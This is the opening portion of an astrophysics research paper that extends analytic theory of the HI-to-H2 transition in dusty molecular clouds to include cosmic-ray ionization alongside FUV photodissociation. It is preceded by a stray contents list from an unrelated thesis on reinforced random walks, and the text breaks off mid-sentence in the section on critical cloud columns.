Alternating Players * 5.1.2 Random Player Selection * 5.2 Model on \(\mathbb{Z}\) * 5.3 Recurrence or Finite Range on \(\mathbb{Z}\) * 6 Biased Reinforced Random Walk * 6.1 \(\lambda^{*}\)-Biased Edge-Reinforced Random Walk * 6.1.1 Some Simulations * 6.1.2 Stochastic Approximation * 6.2 \(\lambda^{+}\)-Biased Edge-Reinforced Random Walk ### Reinforced Random Walk on Transient Environment #### Conclusion ###### Contents * 1 Introduction * 2 Preliminaries * 3.1 The \(\mathcal{L}\)-valued \(\mathcal{L} List of Figures * 1 Estimating conductance ratios * 2 Estimating conductance ratios along a deterministic path \(\gamma\) * 3 Bounding \(Q\) with the help of Bernoulli random variables * 4 Edge weights of the line segment at time \(n\) * 5 Possible walker locations after \(2l-1\) steps of a path \(\rho\) of length \(2l\) * 6 Edge weights on \(\mathbb{Z}\) at time \(n\) * 7 Evolution of the supermartingale during 4 steps of the ERRW with multiple walkers * 8 Label exchange lemma * 9 Illustration: proof that all walkers recurrent or all have finite range * 10 Edge weights and transition probabilities for the biased walk on \(\mathbb{Z}\) at time \(n\) * 11 Average speed of the random walk * 12 Average last visit to the root by the random walk * 13 Transition probabilities of the \(\lambda^{*}\)-biased ERRW on the triangle at time \(n\) * 14 The vector field of the differential equation on the unit simplex * 15 A random walk in a random environment on \(\mathbb{Z}\) * 16 Edge weights of the walk on transient environment at time of first visit to \(z>0\) List of Tables * 1 Overview of results and conjectures on modified reinforced walks
2308.13889
HI in Molecular Clouds: Irradiation by FUV plus Cosmic Rays
We extend the analytic theory presented by Sternberg et al. (2014) and Bialy & Sternberg (2016) for the production of atomic hydrogen (HI) via FUV photodissociation at the boundaries of dense interstellar molecular (H$_2$) clouds, to also include the effects of penetrating (low-energy) cosmic-rays for the growth of the total HI column densities. We compute the steady-state abundances of the HI and H$_2$ in one-dimensional gas slabs in which the FUV photodissociation rates are reduced by depth-dependent H$_2$ self-shielding and dust absorption, and in which the cosmic-ray ionization rates are either constant or reduced by transport effects. The solutions for the HI and H$_2$ density profiles and the integrated HI columns, depend primarily on the ratios $I_{\rm UV}/Rn$ and $\zeta/Rn$, where $I_{\rm UV}$ is the intensity of the photodissociating FUV field, $\zeta$ is the H$_2$ cosmic-ray ionization rate, $n$ is the hydrogen gas density, and $R$ is the dust-surface H$_2$ formation rate coefficient. We present computations for a wide range of FUV field strengths, cosmic-ray ionization rates, and dust-to-gas ratios. We develop analytic expressions for the growth of the HI column densities. For Galactic giant molecular clouds (GMCs) with multiphased (warm/cold) HI envelopes, the interior cosmic-ray zones will dominate the production of the HI only if $\zeta \gtrsim 4.5\times 10^{-16} \times (M_{\rm GMC}/10^6 \ M_{\odot})^{-1/2}$~s$^{-1}$, where $M_{\rm GMC}$ is the GMC mass, and including attenuation of the cosmic-ray fluxes. For most Galactic GMCs and conditions, FUV photodissociation dominates over cosmic-ray ionization for the production of the HI column densities. Furthermore, the cosmic-rays do not affect the HI-to-H$_2$ transition points.
Amiel Sternberg, Shmuel Bialy, Alon Gurman
2023-08-26T14:20:55Z
http://arxiv.org/abs/2308.13889v2
# HI in Molecular Clouds: Irradiation by FUV plus Cosmic Rays ###### Abstract We extend the analytic theory presented by Sternberg et al. (2014) and Bialy & Sternberg (2016) for the production of atomic hydrogen (HI) via FUV photodissociation at the boundaries of dense interstellar molecular (H\({}_{2}\)) clouds, to also include the effects of penetrating (low-energy) cosmic-rays for the growth of the total HI column densities. We compute the steady-state abundances of the HI and H\({}_{2}\) in one-dimensional gas slabs in which the FUV photodissociation rates are reduced by depth-dependent H\({}_{2}\) self-shielding and dust absorption, and in which the cosmic-ray ionization rates are either constant or reduced by transport effects. The solutions for the HI and H\({}_{2}\) density profiles and the integrated HI columns, depend primarily on the ratios \(I_{\rm UV}/Rn\) and \(\zeta/Rn\), where \(I_{\rm UV}\) is the intensity of the photodissociating FUV field, \(\zeta\) is the H\({}_{2}\) cosmic-ray ionization rate, \(n\) is the hydrogen gas density, and \(R\) is the dust-surface H\({}_{2}\) formation rate coefficient. We present computations for a wide range of FUV field strengths, cosmic-ray ionization rates, and dust-to-gas ratios. We develop analytic expressions for the growth of the HI column densities. For Galactic giant molecular clouds (GMCs) with multiphased (warm/cold) HI envelopes, the interior cosmic-ray zones will dominate the production of the HI only if \(\zeta\gtrsim 4.5\times 10^{-16}\times(M_{\rm GMC}/10^{6}~{}M_{\odot})^{-1/2}~{} \rm s^{-1}\), where \(M_{\rm GMC}\) is the GMC mass, and including attenuation of the cosmic-ray fluxes. For most Galactic GMCs and conditions, FUV photodissociation dominates over cosmic-ray ionization for the production of the HI column densities. Furthermore, the cosmic-rays do not affect the HI-to-H\({}_{2}\) transition points. galaxies:ISM - ISM:clouds - ISM: HI and H\({}_{2}\) - ISM:cosmic rays 0000-0002-0002-0880-0880]Amiel Sternberg ## 1 Introduction The compression of diffuse and warm interstellar atomic hydrogen (HI) gas into dense cold giant molecular (H\({}_{2}\)) clouds (GMCs) is associated with radiative cooling, gravitational collapse, chemical complexity, and galaxy- star- and planet-formation across cosmic time (McKee and Ostriker, 2007; Tacconi et al., 2020; Chevance et al., 2022; Sternberg et al., 2014, hereafter S14). Much of the cold (\(\lesssim 500\) K) HI observed via 21 cm emissions and absorptions in the interstellar medium (ISM) of galaxies is produced in photodissociation regions (PDRs) in the atomic to molecular (HI-to-H\({}_{2}\)) transition layers of the dense star-forming molecular clouds (Allen et al., 1986; Heiner et al., 2011; Walter et al., 2008; Bialy et al., 2017; Schruba et al., 2018; Saintonge and Catinella, 2022). In recent years, hydrodynamical simulations of ever increasing sophistication have been incorporating the coupled radiative transfer and chemical processes necessary for appropriate modeling of the cold HI and H\({}_{2}\) components of the ISM (Bialy et al., 2017; Nickerson et al., 2018; Inoue et al., 2020; Seifried et al., 2022; Katz et al., 2022; Gebek et al., 2023; Hu et al., 2021, 2022; Hopkins et al., 2023; Kim et al., 2023; Gurman et al., 2023). Semianalytic methodology, including "classical" one-dimensional (1D) PDR modeling (Tielens and Hollenbach, 1985; van Dishoeck and Black, 1988; Sternberg and Dalgarno, 1989; Wolfire et al., 2022) remain essential tools for interpreting observations, and for understanding and post-processing the results of the hydrodynamical simulations (Levrier et al., 2012; Bialy and Sternberg, 2016; Rollig & Ossenkopf-Okada, 2022; Pound & Wolfire, 2023; Kim et al., 2023a; Bisbas et al., 2023). H\({}_{2}\) photodissociation by far-ultraviolet (FUV, \(\sim 1000\) A) radiation is limited by dust absorption to typical hydrogen gas column densities of \(\sim 10^{21}\) cm\({}^{-2}\) (or gas surface densities \(\Sigma_{\rm gas}\sim 11\) M\({}_{\odot}\) pc\({}^{-2}\) including helium) with temperatures \(\sim 100\) K. At greater cloud depths a residual (but still significant) abundance of ultra-cold (\(\sim 20\) K) atomic hydrogen may be maintained by low-energy (\(\lesssim 1\) Gev) cosmic ray proton bombardment (Spitzer & Tomasko, 1968; Solomon & Werner, 1971; Dalgarno, 2006; Gabici, 2022), and observable as "HI narrow self-absorption" (HINSA) features in 21 cm line profiles (Knapp, 1974; Li & Goldsmith, 2003; Goldsmith et al., 2007; Seifried et al., 2022). What are the relative contributions of FUV photodissociation and cosmic-ray bombardment to the production of HI in typical molecular clouds in star-forming galaxies? In S14 and Bialy & Sternberg (2016, hereafter BS16) we presented numerical and analytic theory for the HI column densities produced by photodissociation in the HI-to-H\({}_{2}\) transition layers in optically thick and dusty PDRs, but with the exclusion of cosmic-rays. In Bialy & Sternberg (2015) we investigated the HI/H\({}_{2}\) balance in low-metallicity cloud interiors dominated by cosmic-ray processes, but with no FUV. In Sternberg et al. (2021) we did consider combined FUV and cosmic-ray irradiation, but for dust-_free_ systems in which cosmic-ray ionization, rather than dust catalysis, drives a gas-phase conversion of HI to H\({}_{2}\), and in which the attenuation of the photodissociation rate is via pure H\({}_{2}\) absorption line self-shielding. Such dust-free PDRs may be relevant for young Universe conditions at the epoch of first star-formation. In this paper, we extend the analytic theory we presented in S14 and BS16 for _dusty_ clouds, to also include cosmic-ray removal of the H\({}_{2}\) and the associated production of residual HI in the extended molecular cloud interiors. This in addition to direct photodissociation in the cloud surface PDRs. In SS2.1 and 2.2 we write down our basic HI/H\({}_{2}\) formation-destruction equation that includes a term for cosmic-ray removal of H\({}_{2}\) and the associated production of HI. We define the basic physical quantities and dimensionless parameters in the problem, \(\alpha\), \(\beta\), \(\tilde{\sigma}_{g}\), and \(G\). We derive analytic expressions for the growth of the HI column density, from the outer PDR into the shielded cosmic-ray zone (CRZ), as a function of the gas density, far-UV field intensity, cosmic-ray ionization rate, and dust-to-gas ratio. In SS2.3 we develop a formula for the critical cloud depths at which cosmic-rays dominate the the HI columns. In SS2.4 we apply our formula to Galactic giant molecular clouds (GMCs) to assess whether cosmic rays can be significant contributors to HI columns in GMCs including their PDRs. In SS3 we present numerical computations for the HI and H\({}_{2}\) abundance profiles and HI columns densities for a wide range of parameter combinations of the FUV intensity, cosmic-ray ionization rate, and gas density. We present results with and without the inclusion of a model for attenuation of the cosmic-ray fluxes. We also show how the profiles scale with the assumed dust-to-gas ratio. We discuss the effects of cosmic-ray ionization on the locations of the HI-to-H\({}_{2}\) transition points in the Appendix. We summarize in SS4. ## 2 Theory ### Formation-Destruction Equation We consider an idealized one-dimensional semi-infinite cloud in slab geometry exposed on one side to beamed (normally incident) far-ultraviolet radiation, in combination with a flux of penetrating cosmic ray particles. In dusty systems the formation-destruction equation for the steady-state HI and H\({}_{2}\) fractions at any cloud depth is \[Rnx_{\rm HI}~{}=~{}[\frac{1}{2}D_{0}f(N_{\rm H_{2}})e^{-\tau_{\rm dust}}~{}+~{ }\phi\zeta\frac{s(N)}{C}]x_{\rm H_{2}} \tag{1}\] where \(x_{\rm HI}\equiv n_{\rm HI}/n\) is the atomic (HI) fraction, \(x_{\rm H_{2}}\equiv n_{\rm H_{2}}/n\) is the molecular (H\({}_{2}\)) fraction, and \(n_{\rm HI}\), \(n_{\rm H_{2}}\), and \(n\), are the atomic, molecular, and total hydrogen gas densities (cm\({}^{-3}\)). Particle conservation is \[x_{\rm HI}+2x_{\rm H_{2}}=1~{}~{}~{}, \tag{2}\] where we assume that the abundances of hydrogen species other than HI or H\({}_{2}\) are negligibly small1. Footnote 1: See for example Fig. 10 in Bialy & Sternberg (2015) or Fig. 6 in Sternberg et al. (2021). The lefthand side of Eq. (1) is the H\({}_{2}\) formation rate (s\({}^{-1}\)), where \[R\equiv 3\times 10^{-17}~{}\tilde{\sigma}_{g}~{}T_{2}^{1/2}~{}~{}~{}~{}~{}{ \rm cm}^{3}~{}{\rm s}^{-1} \tag{3}\] is the grain-surface H\({}_{2}\) formation rate coefficient, \(T_{2}\equiv T/(100\) K) where \(T\) is the gas temperature (K), and \(\tilde{\sigma}_{g}\) is the dust-to-gas ratio normalized to the standard Galactic ISM dust-to-gas mass ratio of 1:100 for which \(\tilde{\sigma}_{g}\)=1 (Bohlin et al., 1978; Remy-Ruyer et al., 2014). The righthand side of Eq. (1), is the H\({}_{2}\) destruction rate by Lyman-Werner band photodissociation (LW: 912-1108 A) in the PDR, and by cosmic-ray impact in the CRZ. In the first term, \[D_{0}\equiv 5.8\times 10^{-11}~{}I_{\rm UV}~{}~{}~{}~{}~{}{\rm s}^{-1}\] is the unattenuated free-space rate (Sternberg et al., 2014; Heays et al., 2017) for LW band photodissociation, \[\mathrm{H_{2}}\ +\ \nu_{\mathrm{LW}}\ \rightarrow\ \mathrm{H}\ +\ \mathrm{H}\quad, \tag{4}\] where \(I_{\mathrm{UV}}\) is the far ultraviolet (6-13.6 eV) intensity relative to the Draine (1978) representation for the interstellar radiation field in the Solar neighborhood (\(I_{\mathrm{UV}}=1\)). The factor of 1/2 accounts for the reduction of the photodissociation rate at the cloud surface due to the presence of the optically thick slab itself. The FUV and photodissociation rate are attenuated by a combination of dust absorption, and \(\mathrm{H_{2}}\) self-shielding as the LW absorption lines become optically thick. The exponential term in Eq. (1) accounts for the dust attenuation. The LW band dust optical depth \[\tau_{\mathrm{dust}}\equiv\sigma_{g}(N_{\mathrm{HI}}+2N_{\mathrm{H_{2}}}) \tag{5}\] where \(N=N_{\mathrm{HI}}+2N_{\mathrm{H_{2}}}\) is the total (atomic plus molecular) hydrogen column density from the cloud surface, and \[\sigma_{g}\equiv 1.9\times 10^{-21}\ \tilde{\sigma}_{g}\quad\ \ \mathrm{cm^{2}} \tag{6}\] is the dust absorption cross section per hydrogen nucleus. Here \(\tilde{\sigma}_{g}\) is the same dust-to-gas ratio appearing in Eq. (3). This parameter can also be viewed as the normalized dust absorption cross section. I.e., we are assuming that the \(\mathrm{H_{2}}\) formation rate coefficient (Eq. [3]) and the dust absorption cross section (Eq. [6]) scale identically with the overall dust abundance. The \(\mathrm{H_{2}}\) self-shielding function \[f(N_{\mathrm{H_{2}}})\equiv\frac{1}{\sigma_{d}}\frac{dW_{d}(N_{\mathrm{H_{2}} })}{dN_{\mathrm{H_{2}}}} \tag{7}\] where \(W_{d}(N_{\mathrm{H_{2}}})\) (\(\mathrm{H_{2}}\)) is the multi-line curve of growth for the \(\mathrm{H_{2}}\) dissociation bandwidth, and \(\sigma_{d}=2.36\times 10^{-3}\ \mathrm{cm^{2}}\) Hz is the total \(\mathrm{H_{2}}\) dissociation cross section (see S14 for a detailed discussion of these quantities). We use the Draine and Bertoldi (1996) formula, as verified by S14, for the self-shielding function. At the cloud surface, \(N_{\mathrm{H_{2}}}=0\) and \(f=1\). For \(N_{\mathrm{H_{2}}}\gtrsim 10^{14}\ \mathrm{cm^{-2}}\), the Doppler cores become optically thick and \(f\) becomes small. For \(N_{\mathrm{H_{2}}}\gtrsim 10^{22}\ \mathrm{cm^{-2}}\) the Lorentzian wings of the LW absorption lines overlap, and\(f\to 0\). In the second term in Eq. (1), \(\phi\varsigma s(N)\) is the local destruction rate of the \(\mathrm{H_{2}}\) by the cosmic rays. Here, \[\zeta=1.0\times 10^{-16}\ \zeta_{-16}\quad\ \ \mathrm{s^{-1}} \tag{8}\] is the unattenuated free-space rate of \(\mathrm{H_{2}}\) ionization by cosmic-ray impact \[\mathrm{H_{2}}\ +\ \mathrm{cr}\ \rightarrow\ \mathrm{H_{2}^{+}}\ +\ \mathrm{e}\quad. \tag{9}\] This includes ionization by the primary cosmic-rays and the secondary energetic electrons. The parameter \(\phi\), of order unity, is the number of \(\mathrm{H_{2}}\) destruction events per cosmic-ray ionization. The \(\mathrm{H_{2}}\) destruction processes include ion-molecule chemical reactions driven by the initiating cosmic-ray ionizations, as well as direct cosmic-ray dissociation of the \(\mathrm{H_{2}}\). In a steady-state, the hydrogen gas is primarily a mixture of HI and \(\mathrm{H_{2}}\), and for a predominantly molecular medium \(\phi\approx 2\)(Bialy and Sternberg, 2015; Sternberg et al., 2021). The factor \(C\) in the second term accounts for possibly different \(\mathrm{H_{2}}\) formation rates in the CRZs compared to the PDRs due to density and temperature gradients, as well as additional gas clumping in the CRZs. Differing formation rates imply \[C\ =\ \frac{(nT^{1/2})_{\mathrm{CRZ}}}{(nT^{1/2})_{\mathrm{PDR}}}\quad. \tag{10}\] For pressure equilibrium this then gives, \[C\ =\ \left(\frac{n_{\mathrm{CRZ}}}{n_{\mathrm{PDR}}}\right)^{1/2}\ =\ \left(\frac{T_{\mathrm{ CRZ}}}{T_{\mathrm{PDR}}}\right)^{-1/2}\quad. \tag{11}\] For example, \(C\approx\sqrt{5}\) for pressure equilibrium between a FUV heated PDR with \(T\approx 100\) K, and a cosmic-ray heated CRZ with \(T\approx 20\) K. \(C\) can be increased further if there is any gas clumping. The function \(s(N)\) accounts for the possible attenuation of the cosmic-ray energy densities with cloud depth, and reduction of the associated \(\mathrm{H_{2}}\) ionization rates (Neufeld and Wolfire, 2017; Padovani et al., 2018; Sternberg et al., 2021). However, the intrinsic energy spectra of the low-energy cosmic rays are uncertain, as are the transport mechanisms, e.g. free-streaming along magnetic field lines, or diffusive pitch-angle scattering off of pre-existing or self-generated MHD waves (Zweibel, 2013; Padovani et al., 2020; Kempski and Quataert, 2022). In our computations we either exclude cosmic-ray attenuation entirely (and set \(s=1\)) or adopt a simple representative form for the cosmic-ray attenuation function. As in Sternberg et al. (2021), when including cosmic-ray attenuation we adopt the Padovani et al. (2018) broken power-law model \[s(N)=\begin{cases}1&N_{\mathrm{eff}}<N_{\mathrm{cr}}\\ \\ (N_{\mathrm{eff}}/N_{\mathrm{cr}})^{-a}&N_{\mathrm{eff}}>N_{\mathrm{cr}}\quad. \end{cases} \tag{12}\] Here \(N_{\mathrm{eff}}\equiv N/\mathrm{cos}\theta\) is the effective absorbing gas column density, where \(\theta\) is the angle of the magnetic field along which the cosmic-rays propagate relative to the cloud normal, and \(N_{\mathrm{cr}}\) is the attenuation scale column. We use "model \(\mathcal{H}\)" of Padovani et al. (2018) for which \(a=0.385\), and \(N_{\rm cr}=10^{19}\) cm\({}^{-2}\), and set \(\cos\!\theta=1\). This model is in agreement with observed declines of the cosmic-ray ionization rates with increasing cloud column densities (Caselli et al., 1998; Indriolo and McCall, 2012; Neufeld and Wolfire, 2017). See Fig. C1 in Padovani et al. (2022) for the full observational compilation. The power-law in Eq. (12) is valid for \(N_{\rm eff}\) between \(10^{19}\) and \(10^{24}\) cm\({}^{-2}\). For \(N_{\rm eff}<10^{19}\) cm\({}^{-2}\), \(s=1\), and divergence is avoided at small columns. Our basic question is: when (if ever) does internal cosmic-ray production of HI compete with photodissociation in the build-up of HI column densities in interstellar clouds? We are particularly interested in optically thick clouds consisting of fully developed outer photodissociation regions (PDRs) surrounding inner cosmic-ray dominated zones (CRZs). We are interested in the total HI columns, irrespective of the temperature- and depth-dependent line widths of the associated 21 cm signatures. ### Ode For our 1D geometry, the atomic to molecular density ratio \(x_{\rm HI}/x_{\rm H_{2}}\equiv dN_{\rm HI}/dN_{\rm H_{2}}\), and Eq. (1) can be written as the ordinary differential equation (ODE) \[\frac{dN_{\rm HI}}{dN_{\rm H_{2}}}\ =\ \frac{1}{2}\alpha f(N_{\rm H_{2}})e^{- \sigma_{g}N}\ +\ \beta s(N)\quad. \tag{13}\] In this equation the independent variable is \(N_{\rm H_{2}}\) (with \(N=N_{\rm HI}+2N_{\rm H_{2}}\)) and the initial condition is \(N_{\rm HI}(0)=0\). The parameters \[\alpha\equiv\frac{D_{0}}{Rn}\ =\ 1.9\times 10^{4}\ \frac{I_{\rm UV}}{\bar{ \sigma}_{g}n_{2}}T_{2}^{-1/2}\quad, \tag{14}\] and \[\beta\equiv\frac{\phi\zeta}{RnC}\ =\ 6.7\times 10^{-2}\ \frac{\zeta_{-16}}{ \bar{\sigma}_{g}n_{2}C}T_{2}^{-1/2}\quad, \tag{15}\] where \(n_{2}\equiv n/(100\ {\rm cm}^{-3})\). Here and henceforth we assume \(\phi=2\). The parameter \(\alpha\) is the ratio of the unshielded free-space H\({}_{2}\) photodissociation rate to the molecular formation rate, and \(\beta\) is the ratio of the unattenuated cosmic-ray destruction rate to the molecular formation rate. For characteristic interstellar conditions \(I_{\rm UV}\approx 1\), and \(\alpha\approx 1.9\times 10^{4}\) for a cold gas density \(n_{2}=1\). The parameter \(\alpha\) remains large even for \(n_{2}\gg 1\), especially near regions of active star-formation where the FUV field intensity \(I_{\rm UV}\gg 1\). At the cloud edge the H\({}_{2}\) is almost fully dissociated and the molecular fraction \[x_{\rm H_{2}}\ \approx\ \frac{2}{\alpha}\ =\ 1.1\times 10^{-4}\tilde{\sigma}_{ g}T_{2}^{1/2}\frac{n_{2}}{I_{\rm UV}}\quad. \tag{16}\] The molecular fraction grows as the FUV is attenuated with increasing cloud depth. The Galactic cosmic-ray ionization rate also varies depending on location, with values approaching \(10^{-15}\) s\({}^{-1}\) in diffuse gas down to \(\sim 10^{-17}\) s\({}^{-1}\) in dense clouds (e.g. Caselli et al., 1998; Indriolo and McCall, 2012). See also the observational summary in Fig. C1 in Padovani et al. (2022). Some of this variation may be indicative of attenuation of the cosmic-ray fluxes as they traverse the clouds (Neufeld and Wolfire, 2017). Here we adopt \(\zeta_{-16}=1\) as a global characteristic value for the Galactic free-space cosmic-ray ionization rate. With \(\zeta_{-16}=n_{2}=T_{2}=\tilde{\sigma}_{g}=1\), and with \(C=\sqrt{5}\) for the CRZ, \(\beta=3.0\times 10^{-2}\). The cosmic-ray ionization rates may be substantially larger in clouds near supernova remnants (Indriolo et al., 2010; Ceccarelli et al., 2011; Schuppan et al., 2012). In most ISM environments \(\alpha\gg 1\) and \(\beta\lesssim 1\). For constant \(Rn\) (independent of cloud depth) \(\alpha\) is the maximal atomic to molecular density ratio at the fully photodissociated cloud edge, and \(\beta\) is the minimal atomic to molecular ratio in the optically thick cosmic-ray dominated interior (in the absence of CR attenuation). Complete atomic to molecular transitions are expected as the clouds become sufficiently optically thick. Given the solution to Eq. (13) for \(N_{\rm HI}(N_{\rm H_{2}})\), and with \(N\equiv N_{\rm HI}(N_{\rm H_{2}})+2N_{\rm H_{2}}\) we obtain profiles for the HI column, \(N_{\rm HI}\), and the derivatives, \(x_{\rm HI}\) and \(x_{\rm H_{2}}\), as functions of \(N\). In SS3 we present such profiles computed numerically, but we first discuss several analytic solutions, as follows. #### 2.2.1 No CR attenuation In the absence of any CR attenuation, with \(s\equiv 1\) everywhere, and for any \(\beta\), the HI fraction in the CRZ is, \[x_{\rm HI,CRZ}\ =\ \frac{\beta}{2+\beta}\quad. \tag{17}\] The atomic fraction \(x_{\rm HI}=1/2\) for \(\beta=2\). For a predominantly molecular CRZ, i.e. for \(\beta\ll 1\), the residual HI density is \[n_{\rm HI,CRZ}\ \approx\ \frac{\beta}{2}\ n_{\rm CRZ}\ =\ 3.33\times T_{2,\rm CRZ }^{-1/2}\ \tilde{\sigma}_{g}^{-1}\zeta_{-16}\quad\quad{\rm cm}^{-3} \tag{18}\] _independent_ of the total cloud density at any point (see also Solomon and Werner, 1971; Li and Goldsmith, 2003). For example, for \(\zeta_{-16}=\tilde{\sigma}_{g}=1\), and a CRZ temperature \(T_{2,\rm CRZ}=0.2\), the HI density in the CRZ is \(n_{\rm HI,CRZ}=7.4\) cm\({}^{-3}\). For \(\beta\lesssim 1\), and with \(s\equiv 1\), an excellent approximate analytic solution to Eq. (13) is \[N_{\rm HI}(N_{\rm H_{2}})\ \approx\ \frac{1}{\sigma_{g}}{\rm ln}\big{[}\frac{ \alpha}{2}G(N_{\rm H_{2}};\sigma_{g})+1\big{]}\,+\,\beta N_{\rm H_{2}}\ . \tag{19}\] The first term on the right is the HI column built up by photodissociation, and the second term is the HI due to cosmic-rays, both as functions of the molecular column \(N_{\rm H_{2}}\). In this expression, \[\begin{split} G(N_{\rm H_{2}};\sigma_{g})\ \equiv&\ \sigma_{g}\int_{0}^{N_{\rm H_{2}}}f(N^{\prime}_{\rm H_{2}})\ {\rm e}^{-2\sigma_{g}N^{\prime}_{\rm H_{2}}}\ dN^{\prime}_{\rm H_{2}}\\ &=\ \frac{\sigma_{g}}{\sigma_{d}}W_{g}(N_{\rm H_{2}};\sigma_{g})\end{split} \tag{20}\] where \(W_{g}(N_{\rm H_{2}};\sigma_{g})\) is the (universal) H\({}_{2}\)-dust limited curve of growth for the LW dissociation bandwidth (see S14 for a detailed discussion). For any \(\sigma_{g}\), \(W_{g}\) is a preexisting function of \(N_{\rm H_{2}}\), independent of the cloud parameters \(I_{\rm UV}\) or \(n\). We use the analytic form for \(W_{g}\) given by BS16 (their Eq. [27]). When all of the LW radiation is absorbed the integral converges to a constant, \[G\ \equiv\ \frac{\sigma_{g}}{\sigma_{d}}W_{g,\rm tot}(\sigma_{g})\ \approx\ 3.0\!\times\!10^{-5}\ \tilde{\sigma}_{g}\!\left(\frac{9.9}{1+8.9\tilde{\sigma}_{g}}\right)^{0.37}. \tag{21}\] Here, \(W_{g,\rm tot}(\sigma_{g})\) is the total dust-limited dissociation bandwidth (Hz), and \(G\) is then the (dimensionless) average H\({}_{2}\) self-shielding factor within an H\({}_{2}\)-dust absorption column. The righthand side of Eq. (21) is our BS16 fitting formula for \(G\) based on the multi-line (_Meudon_) PDR model computations we presented in S14. At cloud depths beyond which all of the LW radiation is absorbed, Eq. (19) becomes \[N_{\rm HI,\it t}\ \approx\ \frac{1}{\sigma_{g}}\!\ln\!\big{[}\frac{\alpha G}{2} +1\big{]}\ +\ \frac{\beta}{2+\beta}N\quad, \tag{22}\] where the basic dimensionless parameter \[\alpha G\ =\ \frac{DG}{Rn}\ =\ 0.59\ \frac{I_{\rm UV}}{n_{2}}T_{2}^{-1/2} \times\left(\frac{9.9}{1+8.9\tilde{\sigma}_{g}}\right)^{0.37}. \tag{23}\] The subscript \(t\) refers to optically thick. The first term in Eq. (22) is the total (asymptotic) HI column density produced by just photodissociation in optically thick PDRs, \[N_{\rm HI,PDR}\ \equiv\ \frac{1}{\sigma_{g}}\!\ln\!\left[\frac{\alpha G}{2}+1 \right]\quad. \tag{24}\] This is the formula for the total HI column density for beamed FUV fields derived by S14 in the absence of cosmic rays (i.e., for \(\beta=0\)). The second term in Eq. (22) \[N_{\rm HI,CRZ}\ \equiv\ \frac{\beta}{2+\beta}N \tag{25}\] is the additional HI column produced by the cosmic-rays, and it grows arbitrarily large with \(N\) unless the cosmic-ray ionization rate is sufficiently attenuated. In this term we have used the relation \(N_{\rm H_{2}}=N/(2+\beta)\) for the CRZ in replacing \(N_{\rm H_{2}}\) with \(N\) in Eq. (19). Differentiation2 shows that Eq. (19) is a good (but formally approximate) solution to Eq. (13) so long as \(\beta\sigma_{g}N_{\rm H_{2}}\) is everywhere negligible compared to either \(\sigma_{g}N_{\rm HI}\) or \(2\sigma_{g}N_{\rm H_{2}}\). The latter two quantities are the HI-dust and H\({}_{2}\)-dust optical depths associated with the HI and H\({}_{2}\) columns respectively. Thus, if \(\beta=0\), i.e. with no cosmic-rays, Eqs. (19) and (22) are exact. But Eq. (19) remains accurate, so long as \(\beta<1\). We verify this in SS3 by integrating Eq. (13) numerically and comparing to our analytic formulae. Footnote 2: Differentiating Eq. (19) gives \(\tau_{\rm dust}=\sigma_{g}(N_{\rm HI}+(2-\beta)N_{\rm H_{2}})\), rather than Eq. (5), for any \(N_{\rm H_{2}}\). For \(\beta<1\) the spurious term does not contribute significantly to the absorption of the FUV, and the shapes of the HI-to-H\({}_{2}\) profiles are unaffected. #### 2.2.2 With CR attenuation When CR attenuation is included, the HI fraction in the CRZ decreases with cloud depth as \[x_{\rm HI,CRZ}\ =\ \frac{\beta s(N)}{2+\beta s(N)}\ \approx\ \frac{1}{2}\beta s (N)\quad. \tag{26}\] CR attenuation reduces the HI that is built up in the CRZs. Our analytic approximation for \(N_{\rm HI,\it t}\) can be generalized for arbitrary cosmic-ray attenuation functions, \(s(N)\), by making the replacement \[\frac{\beta}{2+\beta}N\ \to\ \frac{\beta}{2+\beta}\int_{0}^{N}s(N^{ \prime})dN^{\prime}\] \[=\frac{\beta}{2+\beta}\times\begin{cases}N&N<N_{\rm cr}\\ \\ N_{\rm cr}+\frac{N_{\rm cr}}{1-a}\Big{[}\big{(}N/N_{\rm cr}\big{)}^{1-a}-1 \Big{]}&N>N_{\rm cr}\end{cases} \tag{27}\] for the second term in Eq. (22). In the second line we have evaluated the integral assuming the attenuation function given by Eq. (12) with \(\cos\!\theta=1\). ### Critical Cloud Columns The two terms on the righthand side of Eq. (22) are equal at the critical gas column, \(N=N_{\rm crit}\), at which the cosmic rays start to dominate the growth of the HI column. Thus, for unattenuated cosmic-rays (\(s\equiv 1\)), \[N_{\rm crit}\ =\ \frac{1}{\sigma_{g}}\,\frac{(2+\beta)}{\beta}\,\ln[\alpha G/2+1]\quad. \tag{28}\] Multiplying through by \(\sigma_{g}\) gives the critical dust opacity, \[\tau_{\rm dust,crit}\ =\ \frac{(2+\beta)}{\beta}\,\ln[\alpha G/2+1]\quad, \tag{29}\] which depends on just the two (dimensionless) parameters \(\alpha G\) and \(\beta\). At a gas column \(N\) (or dust opacity \(\tau_{\rm dust}\)), cosmic-rays dominate the production of the HI if \(N>N_{\rm crit}\) (or if \(\tau_{\rm dust}>\tau_{\rm dust,crit}\)), otherwise photodissociation dominates. In the weak-field limit, \(\alpha G/2\ll 1\) (and assuming \(\beta\lesssim 1\)), we have3 Footnote 3: For \(G\) in the evaluation of Eq.(30) we have dropped the term \([9.9/(1+8.9\bar{\sigma}_{g})]^{0.37}\), which varies by a factor of 4.2 for \(\tilde{\sigma}_{g}\) between 0.1 and 10. \[N_{\rm crit,\,{\it w}}\;\approx\;\frac{1}{\sigma_{g}}\frac{\alpha G}{\beta}\; \approx\;4.6\times 10^{21}\;\frac{I_{\rm UV}}{\zeta_{-16}}C\;\;\;\;\;{\rm cm}^{- 2}\;. \tag{30}\] In this limit most of the HI produced by photodissociation is built up past the HI-to-H\({}_{2}\) transition point in gas that is primarily molecular (as shown in Fig. 2 in SS 3, see also Appendix). When cosmic-rays are added the CRZs and PDRs overlap, and the critical column is a measure of the relative HI production efficiency by photodissociation versus cosmic-ray ionization in the molecular gas. The critical column is therefore proportional to \(I_{\rm UV}/\zeta_{-16}\), independent of the cloud density \(n\) and/or H\({}_{2}\) formation rate. In the strong-field limit, \(\alpha G\gg 1\) (and again for \(\beta\lesssim 1\)), \[N_{\rm crit,\,{\it s}}\;\approx\;\frac{1}{\sigma_{g}}\frac{2\;{\rm ln}[\alpha G /2]}{\beta}\;=\;1.6\times 10^{22}\;\frac{n_{2}T_{2}^{1/2}C}{\zeta_{-16}} \mathcal{O}(1)\;\;{\rm cm}^{-2}. \tag{31}\] For strong fields the photodissociated HI columns are built up in a (self-limited) fully atomic outer layer, and are only weakly (logarithmically) dependent on \(I_{\rm UV}\). The cosmic-ray contributions to the HI occur in the inner fully optically thick regions where the atomic fractions are proportional to \(\beta\). The critical gas column is therefore proportional to the ratio of the H\({}_{2}\) formation rate to ionization 